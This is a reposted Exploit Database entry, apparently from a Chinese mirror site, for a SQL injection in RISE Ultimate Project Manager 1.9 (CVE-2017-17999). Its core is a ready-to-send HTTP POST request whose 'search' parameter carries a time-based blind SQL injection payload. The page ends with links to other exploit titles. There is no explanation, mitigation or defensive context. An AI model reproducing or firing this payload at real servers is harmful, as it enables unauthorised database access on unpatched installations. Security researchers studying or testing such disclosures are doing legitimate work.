RISE 1.9 – ‘search’ SQL Injection

Exploit Database
14 阅读

作者： Ahmad Mahfouz

日期： 2018-01-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/43591/

# Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection
# Exploit Author: Ahmad Mahfouz 
# Contact: http://twitter.com/eln1x
# Date: 30/12/2017
# CVE: CVE-2017-17999
# Vendor Homepage: http://fairsketch.com/
# Version: 1.9

 

 

POST /index.php/knowledge_base/get_article_suggestion/ HTTP/1.1
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close

 
search=product'%20and%20(select*from(select(sleep(20)))a)--%20

last Exploits
RISE 1.9 – ‘search’ SQL Injection的更多信息

Games Script – ‘Galore’ Backup Dump：
Symphony – ‘sort’ SQL Injection：
Vanilla Forums 2-0-18-4 – SQL Injection：
Clipbucket 2.5 – Blind SQL Injection：
WordPress Plugin Contact Form 7 to Database Extension 2.10.32 – CSV Injection：
68KB Knowledge Base 1.0.0rc3 – Cross-Site Request Forgery (Edit Main Settings)：
OsCSS 1.2 – Arbitrary File Upload：
4 TOTOLINK Router Models – Cross-Site Request Forgery / Cross-Site Scripting：